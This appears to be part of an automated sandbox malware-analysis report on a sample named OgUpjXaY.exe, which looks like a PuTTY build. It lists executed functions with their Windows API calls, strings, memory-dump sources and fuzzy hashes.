Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Function 00007FFDA179078D Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.970486474.00007FFDA1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffda1790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb92739f62331d95b6ecaafed368f17f4f30bbbfa5b686b06b07c73d2c73cfc6
Instruction ID: cec9350679299d3318a4a4e943b98e3aeb54e9282d213e2b6163c436930fdce4
Opcode Fuzzy Hash: fb92739f62331d95b6ecaafed368f17f4f30bbbfa5b686b06b07c73d2c73cfc6
Instruction Fuzzy Hash: 75D11866B1FBD64FEBD6967818752B47FE8DF52220B0801FBD098C72D3D808AC498746

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDA1790F89 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.970486474.00007FFDA1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffda1790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a684706ab387edc700c8674c29353c9c722166dde733f3f4f806fd8e386a7b0c
Instruction ID: a6cb917c44ade11fb986122bd01a600846972411134600a2d82f6a965fb5b0b4
Opcode Fuzzy Hash: a684706ab387edc700c8674c29353c9c722166dde733f3f4f806fd8e386a7b0c
Instruction Fuzzy Hash: 7F616D22F1FA868FF7D9963C58713B876C6DF41220B4811BED05EC72C3ED09E8198A49

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDA179085A Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.970486474.00007FFDA1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffda1790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faf10485c957b62e03dabb8008d68f6119b6189eba1ce080c31fd5979059dcdd
Instruction ID: 90f3b1a8a4832c0c820a6d46f4ad1db0384fa0df8ed0ac3c3822d2052a88848d
Opcode Fuzzy Hash: faf10485c957b62e03dabb8008d68f6119b6189eba1ce080c31fd5979059dcdd
Instruction Fuzzy Hash: C831F017F2FA974BFBE5A6B8087527876C8EF4166074810BAD45DC62D3DC1CAC484A4A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDA1791069 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.970486474.00007FFDA1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffda1790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e8872da96883f3ea3547ad3ea23b0471105527e79f7ff8a553706b68c19e55c
Instruction ID: 0878743fa5687234c5819585e84288e7cc4f9a007dfe3f217f9a718f6c3a77e9
Opcode Fuzzy Hash: 1e8872da96883f3ea3547ad3ea23b0471105527e79f7ff8a553706b68c19e55c
Instruction Fuzzy Hash: D0213722F0FA868BF7E5963C586127876C1DF4127075811BAD05DC73D3ED1AEC198A09

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDA16C33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.969943863.00007FFDA16C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA16C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffda16c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: e4ce7702d1199e81d4a1d536f2bedb0ae9674f059ce71df97a7bb8b82d2006d6
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 2301677111CB0C4FD744EF0CE451AA6B7E0FB95364F50056DE58AC3665DA36E882CB45

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: OgUpjXaY.exePID: 6876, Parent PID: 6720COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.1%
Total number of Nodes:	313
Total number of Limit Nodes:	29

Executed Functions

Function 00C44740 Relevance: 47.4, APIs: 12, Strings: 15, Instructions: 109
libraryloaderregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00C4474D

Part of subcall function 00C7BAA0: LoadLibraryA.KERNELBASE(00000000,00000000,?,00C89C90,kernel32.dll), ref: 00C7BABF

GetProcAddress.KERNEL32(00000000,FlashWindowEx), ref: 00C4479A
GetProcAddress.KERNEL32(00000000,ToUnicodeEx), ref: 00C447A7
GetProcAddress.KERNEL32(00000000,PlaySoundA), ref: 00C447C6
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00C447E5
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00C447F2
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00C447FF
GetProcAddress.KERNEL32(00000000,GetDpiForMonitor), ref: 00C44828
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 00C44847
GetProcAddress.KERNEL32(00000000,AdjustWindowRectExForDpi), ref: 00C44854
CoInitialize.OLE32(00000000), ref: 00C44875
MessageBoxA.USER32(00000000,Failed to initialize COM subsystem,00000000,00000030), ref: 00C4489F

Strings

FlashWindowEx, xrefs: 00C44794
GetMonitorInfoA, xrefs: 00C447DF
user32.dll, xrefs: 00C4475D
%s Fatal Error, xrefs: 00C44886
AdjustWindowRectExForDpi, xrefs: 00C4484E
shcore.dll, xrefs: 00C4477B
MonitorFromWindow, xrefs: 00C447F9
#k, xrefs: 00C44758
ToUnicodeEx, xrefs: 00C447A1
GetSystemMetricsForDpi, xrefs: 00C44841
GetDpiForMonitor, xrefs: 00C44822
PlaySoundA, xrefs: 00C447C0
Failed to initialize COM subsystem, xrefs: 00C44898
winmm.dll, xrefs: 00C4476C
MonitorFromPoint, xrefs: 00C447EC

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AddressProc$ClipboardFormatInitializeLibraryLoadMessageRegister
String ID: %s Fatal Error$AdjustWindowRectExForDpi$Failed to initialize COM subsystem$FlashWindowEx$GetDpiForMonitor$GetMonitorInfoA$GetSystemMetricsForDpi$MonitorFromPoint$MonitorFromWindow$PlaySoundA$ToUnicodeEx$shcore.dll$user32.dll$winmm.dll$#k
API String ID: 4030309821-2996361279
Opcode ID: 6df7de13092cdf4c0cd8d5e1cd1991422cbe149ca28a41dd123bddf50c6120f9
Instruction ID: d39e52deb3652a115905828ec69bb52681e090876fea3fb40778da55bab10293
Opcode Fuzzy Hash: 6df7de13092cdf4c0cd8d5e1cd1991422cbe149ca28a41dd123bddf50c6120f9
Instruction Fuzzy Hash: 6A3158F9E81760AFD3116F71BC02B6E36A1BB22704B190034F906D6391EB74CA04DBB6

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7050 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 94
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 00CA709E
___from_strstr_to_strchr.LIBCMT ref: 00CA70EE
GetUserNameA.ADVAPI32(00000000), ref: 00CA7114
GetUserNameA.ADVAPI32(00000000), ref: 00CA7140

Strings

GetUserNameExA, xrefs: 00CA7098
secur32.dll, xrefs: 00CA7078
sspicli.dll, xrefs: 00CA7087
Logical name of remote host (e.g. for SSH key lookup):, xrefs: 00CA7050

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: NameUser$AddressProc___from_strstr_to_strchr
String ID: GetUserNameExA$Logical name of remote host (e.g. for SSH key lookup):$secur32.dll$sspicli.dll
API String ID: 1511097851-421106942
Opcode ID: 0f85be742d25155eb8950879a1806ed62df657da360c7e9217d19ea026b683af
Instruction ID: 7ee3b277ebe17a8cc035993c8e4fb963ee45ed1bbdb571976c9b0b13990ee568
Opcode Fuzzy Hash: 0f85be742d25155eb8950879a1806ed62df657da360c7e9217d19ea026b683af
Instruction Fuzzy Hash: 6E21E9707483016BE7142F35BC0AF2F36A4EB52B48F050128F949DB3C1EA759944D6B2

Uniqueness

Uniqueness Score: -1.00%

Function 00C74DA0 Relevance: 138.6, APIs: 40, Strings: 39, Instructions: 372
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C7BAA0: LoadLibraryA.KERNELBASE(00000000,00000000,?,00C89C90,kernel32.dll), ref: 00C7BABF

GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00C74DDB
GetProcAddress.KERNEL32(74D60000,getaddrinfo), ref: 00C74DF8
GetProcAddress.KERNEL32(74D60000,freeaddrinfo), ref: 00C74E13
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00C74E3D
GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00C74E57
GetProcAddress.KERNEL32(00000000,getnameinfo), ref: 00C74E72
GetProcAddress.KERNEL32(74D60000,WSAAddressToStringA), ref: 00C74EA4
GetProcAddress.KERNEL32(74D60000,WSAAsyncSelect), ref: 00C74EC6
GetProcAddress.KERNEL32(74D60000,WSAEventSelect), ref: 00C74EE5
GetProcAddress.KERNEL32(74D60000,select), ref: 00C74F04
GetProcAddress.KERNEL32(74D60000,WSAGetLastError), ref: 00C74F23
GetProcAddress.KERNEL32(74D60000,WSAEnumNetworkEvents), ref: 00C74F42
GetProcAddress.KERNEL32(74D60000,WSAStartup), ref: 00C74F61
GetProcAddress.KERNEL32(74D60000,WSACleanup), ref: 00C74F80
GetProcAddress.KERNEL32(74D60000,closesocket), ref: 00C74F9F
GetProcAddress.KERNEL32(74D60000,ntohl), ref: 00C74FBE
GetProcAddress.KERNEL32(74D60000,htonl), ref: 00C74FDD
GetProcAddress.KERNEL32(74D60000,htons), ref: 00C74FFC
GetProcAddress.KERNEL32(74D60000,ntohs), ref: 00C7501B
GetProcAddress.KERNEL32(74D60000,gethostname), ref: 00C7503A
GetProcAddress.KERNEL32(74D60000,gethostbyname), ref: 00C75059
GetProcAddress.KERNEL32(74D60000,getservbyname), ref: 00C75078
GetProcAddress.KERNEL32(74D60000,inet_addr), ref: 00C75097
GetProcAddress.KERNEL32(74D60000,inet_ntoa), ref: 00C750B6
GetProcAddress.KERNEL32(74D60000,inet_ntop), ref: 00C750D5
GetProcAddress.KERNEL32(74D60000,connect), ref: 00C750F4
GetProcAddress.KERNEL32(74D60000,bind), ref: 00C75113
GetProcAddress.KERNEL32(74D60000,setsockopt), ref: 00C75132
GetProcAddress.KERNEL32(74D60000,socket), ref: 00C75151
GetProcAddress.KERNEL32(74D60000,listen), ref: 00C75170
GetProcAddress.KERNEL32(74D60000,send), ref: 00C7518F
GetProcAddress.KERNEL32(74D60000,shutdown), ref: 00C751AE
GetProcAddress.KERNEL32(74D60000,ioctlsocket), ref: 00C751CD
GetProcAddress.KERNEL32(74D60000,accept), ref: 00C751EC
GetProcAddress.KERNEL32(74D60000,getpeername), ref: 00C7520B
GetProcAddress.KERNEL32(74D60000,recv), ref: 00C7522A
GetProcAddress.KERNEL32(74D60000,WSAIoctl), ref: 00C75249
WSAStartup.WS2_32(00000202,00D42C54), ref: 00C75387
WSAStartup.WS2_32(00000002,00D42C54), ref: 00C753A5
WSAStartup.WS2_32(00000101,00D42C54), ref: 00C753C6

Strings

send, xrefs: 00C75189
socket, xrefs: 00C7514B
WSAEnumNetworkEvents, xrefs: 00C74F3C
listen, xrefs: 00C7516A
wship6.dll, xrefs: 00C74E21
freeaddrinfo, xrefs: 00C74E0D, 00C74E51
getnameinfo, xrefs: 00C74E6C
inet_addr, xrefs: 00C75091
shutdown, xrefs: 00C751A8
closesocket, xrefs: 00C74F99
getpeername, xrefs: 00C75205
setsockopt, xrefs: 00C7512C
getservbyname, xrefs: 00C75072
accept, xrefs: 00C751E6
WSAAsyncSelect, xrefs: 00C74EC0
htonl, xrefs: 00C74FD7
recv, xrefs: 00C75224
WSACleanup, xrefs: 00C74F7A
htons, xrefs: 00C74FF6
inet_ntop, xrefs: 00C750CF
getaddrinfo, xrefs: 00C74DD5, 00C74DF2, 00C74E37
WSAIoctl, xrefs: 00C75243
Unable to load any WinSock library, xrefs: 00C753F0
WSAStartup, xrefs: 00C74F5B
WSAEventSelect, xrefs: 00C74EDF
inet_ntoa, xrefs: 00C750B0
WSAAddressToStringA, xrefs: 00C74E9E
ws2_32.dll, xrefs: 00C74DA0
Unable to initialise WinSock, xrefs: 00C753FA
ntohs, xrefs: 00C75015
bind, xrefs: 00C7510D
gethostname, xrefs: 00C75034
connect, xrefs: 00C750EE
WSAGetLastError, xrefs: 00C74F1D
ntohl, xrefs: 00C74FB8
wsock32.dll, xrefs: 00C74DBB
gethostbyname, xrefs: 00C75053
ioctlsocket, xrefs: 00C751C7
select, xrefs: 00C74EFE

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AddressProc$Startup$LibraryLoad
String ID: Unable to initialise WinSock$Unable to load any WinSock library$WSAAddressToStringA$WSAAsyncSelect$WSACleanup$WSAEnumNetworkEvents$WSAEventSelect$WSAGetLastError$WSAIoctl$WSAStartup$accept$bind$closesocket$connect$freeaddrinfo$getaddrinfo$gethostbyname$gethostname$getnameinfo$getpeername$getservbyname$htonl$htons$inet_addr$inet_ntoa$inet_ntop$ioctlsocket$listen$ntohl$ntohs$recv$select$send$setsockopt$shutdown$socket$ws2_32.dll$wship6.dll$wsock32.dll
API String ID: 1450042416-3487058210
Opcode ID: 0ff2ddac3ae6e729b121d780791a5480247647d47f7279a40033b599f55576c4
Instruction ID: a47cc90e7798541dcb6009866409e2531f84374d99e807eb75180caeb77900ec
Opcode Fuzzy Hash: 0ff2ddac3ae6e729b121d780791a5480247647d47f7279a40033b599f55576c4
Instruction Fuzzy Hash: ACE138BC651B029FD7298F21FD69B3A3BA1FB19345B80851DF816D27A8CBB5C5448E30

Uniqueness

Uniqueness Score: -1.00%

Function 00C5D920 Relevance: 65.4, APIs: 28, Strings: 9, Instructions: 605
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadIconA.USER32(000000C9), ref: 00C5DA18
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00C5DA34
MapDialogRect.USER32(?,00000003), ref: 00C5DA6B
CreateWindowExA.USER32(00000000,STATIC,Cate&gory:,50000000,00000003,00000003,00000062,?,?,000003EF,00000000), ref: 00C5DAAE
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00C5DAC3
SendMessageA.USER32(00000000,00000030,00000000,00000001), ref: 00C5DACB
MapDialogRect.USER32(?,00000003), ref: 00C5DAF5
CreateWindowExA.USER32(00000200,SysTreeView32,00D314DC,50010037,00000003,0000000D,00000062,?,?,000003F0,00000000), ref: 00C5DB42
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00C5DB51
SendMessageA.USER32(00000000,00000030,00000000,00000001), ref: 00C5DB59
_strrchr.LIBCMT ref: 00C5DC5E
_strlen.LIBCMT ref: 00C5DC96
SendMessageA.USER32(?,00001100,00000000,?), ref: 00C5DCC2
SendMessageA.USER32(?,00001102,-00000001,?), ref: 00C5DCE6
SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00C5DD39
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00C5DD46
SendMessageA.USER32(?,0000110C,00000000,00000005), ref: 00C5DD72
GetDlgItem.USER32(?,?), ref: 00C5DE25
DestroyWindow.USER32(00000000), ref: 00C5DE2C
KillTimer.USER32(?,000004CE), ref: 00C5DE4E
MessageBoxA.USER32(?,00000000,Demo screenshot failure,00000010), ref: 00C5DE72
SendMessageA.USER32(?,0000110B,00000009,00000000), ref: 00C5DEC6
SetTimer.USER32(?,000004CE,000003E8,00000000), ref: 00C5DFAD

Part of subcall function 00C5F310: SetWindowTextA.USER32(?,?), ref: 00C5F31F
Part of subcall function 00C5F310: GetWindowLongA.USER32(?,000000EC), ref: 00C5F331
Part of subcall function 00C5F310: SetWindowLongA.USER32(?,000000EC,00000000), ref: 00C5F340

Part of subcall function 00C5F870: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00C5F89B
Part of subcall function 00C5F870: GetClientRect.USER32(?,?), ref: 00C5F8AD
Part of subcall function 00C5F870: MapDialogRect.USER32(?), ref: 00C5F8D6

SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00C5E0CE
InvalidateRect.USER32(?,00000000,00000001), ref: 00C5E0D9
SetFocus.USER32(?), ref: 00C5E0E8

Strings

Cate&gory:, xrefs: 00C5DAA2
firstpath, xrefs: 00C5DEF7
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/dialog.c, xrefs: 00C5DC47, 00C5DEF2
Demo screenshot failure, xrefs: 00C5DE6B
SysTreeView32, xrefs: 00C5DB38
b, xrefs: 00C5DAD5
j == ctrl_path_elements(s->pathname) - 1, xrefs: 00C5DC4C
@, xrefs: 00C5DD54
STATIC, xrefs: 00C5DAA7

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Message$Send$Window$Rect$Dialog$CreateLongTimer$ClientDestroyFocusIconInvalidateItemKillLoadText_strlen_strrchr
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/dialog.c$@$Cate&gory:$Demo screenshot failure$STATIC$SysTreeView32$b$firstpath$j == ctrl_path_elements(s->pathname) - 1
API String ID: 3050031257-3434313354
Opcode ID: 54e95493a75e9b460f8b3529a9bb34a9681395251ddabc6062a6b21ffe46fe10
Instruction ID: 030bb17d6e181f09230ae5095d63b6de22ebe008c203f711213a29eb6967e965
Opcode Fuzzy Hash: 54e95493a75e9b460f8b3529a9bb34a9681395251ddabc6062a6b21ffe46fe10
Instruction Fuzzy Hash: 99121475604340AFE7209F64DC86F6B77E5EF84305F004428FA49AB3E1E7B1A948DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00C88240 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 88
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadCursorA.USER32(00000000,00007F00), ref: 00C88299
RegisterClassA.USER32(00002808), ref: 00C882BC
CreateDialogParamA.USER32(?,?,?,00C88390,00000000), ref: 00C882FB
SetWindowLongA.USER32(00000000,0000001E,00000000), ref: 00C88307
KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00C8833E
IsDialogMessageA.USER32(00000000,?,?,00000000,00000000,00000000), ref: 00C8834D
DispatchMessageA.USER32 ref: 00C88354
PostQuitMessage.USER32(?), ref: 00C88362
DestroyWindow.USER32(00000000,?,00000000,00000000,00000000), ref: 00C88369

Strings

", xrefs: 00C8827E

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Message$DialogWindow$CallbackClassCreateCursorDestroyDispatchDispatcherLoadLongParamPostQuitRegisterUser
String ID: "
API String ID: 1405747859-123907689
Opcode ID: 042f4405f79d11108b78e225ff20d544093d8b507d05b3055a4c11c5206db725
Instruction ID: 698461765695c48eb369dd0ba66cb2e8f206134a96b6eefa5524d243f1072d04
Opcode Fuzzy Hash: 042f4405f79d11108b78e225ff20d544093d8b507d05b3055a4c11c5206db725
Instruction Fuzzy Hash: 993137B4508344AFD7209F24EC48B1ABBF5FB89B08F40481DFA95973A0C775A908CF66

Uniqueness

Uniqueness Score: -1.00%

Function 00C5F910 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapDialogRect.USER32(?), ref: 00C5F94D
CreateWindowExA.USER32(?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00C5F987
SendMessageA.USER32(00000000,00000030,?,00000001), ref: 00C5F997
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000116,?,?,BUTTON,50000007,00000000,00D314DC,?), ref: 00C5F9C3

Strings

LISTBOX, xrefs: 00C5F99D

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Window$CreateDialogMessageRectSend
String ID: LISTBOX
API String ID: 4261271132-1812161947
Opcode ID: 64fac0fe23d168918675f23a94308783d2c7041857b84e697c1300b5bc4beb46
Instruction ID: e422e7432289cdbf84305e5528a9948088de52e7b7636899a1f8ea78f4f7fab3
Opcode Fuzzy Hash: 64fac0fe23d168918675f23a94308783d2c7041857b84e697c1300b5bc4beb46
Instruction Fuzzy Hash: 2B21F376608301BFDB119F94DC42B1BBBE6EF88740F04481DFA9596260C371A864DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C5F310 Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowTextA.USER32(?,?), ref: 00C5F31F
GetWindowLongA.USER32(?,000000EC), ref: 00C5F331
SetWindowLongA.USER32(?,000000EC,00000000), ref: 00C5F340
GetDlgItem.USER32(?,000003ED), ref: 00C5F34E
DestroyWindow.USER32(00000000), ref: 00C5F359

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Window$Long$DestroyItemText
String ID:
API String ID: 4119185043-0
Opcode ID: d7b36682813fa26610a5a9a0ae1e8072681f4e26e078d274448885b09bf776a1
Instruction ID: 575d28c1fe18294c2c18fb02febd4fb4cb3153cdd6be2e2af43b0e336eb53a2e
Opcode Fuzzy Hash: d7b36682813fa26610a5a9a0ae1e8072681f4e26e078d274448885b09bf776a1
Instruction Fuzzy Hash: F7E065741056206BEB016B39BC0CEDA379DEF453127148254F915E12B1D724CA43CDB8

Uniqueness

Uniqueness Score: -1.00%

Function 00C63330 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 00C633D5
SendDlgItemMessageA.USER32(?,?,00000151,00000000,?), ref: 00C633E6

Strings

c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00C63380
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C6337B

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
API String ID: 3015471070-2774982218
Opcode ID: fdfad0de9ac16e48877ed68bafa9bbd91f52819dd33fe64e0f66e60592043edc
Instruction ID: f03088db916fff9a1f40156b5461e6e13f7d95828c558e38b3f8da38d2e9e291
Opcode Fuzzy Hash: fdfad0de9ac16e48877ed68bafa9bbd91f52819dd33fe64e0f66e60592043edc
Instruction Fuzzy Hash: 2521DF70604245AFEB248B04DCD5F36B3A5EF89304F104139E519877A1DB62AE15CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C64450 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentProcessExplicitAppUserModelID.SHELL32(00000000,00C4472A), ref: 00C64468
GetProcAddress.KERNEL32(00000000,SetCurrentProcessExplicitAppUserModelID), ref: 00C64490

Strings

Shell32.dll, xrefs: 00C64474
SetCurrentProcessExplicitAppUserModelID, xrefs: 00C6448A

Memory Dump Source

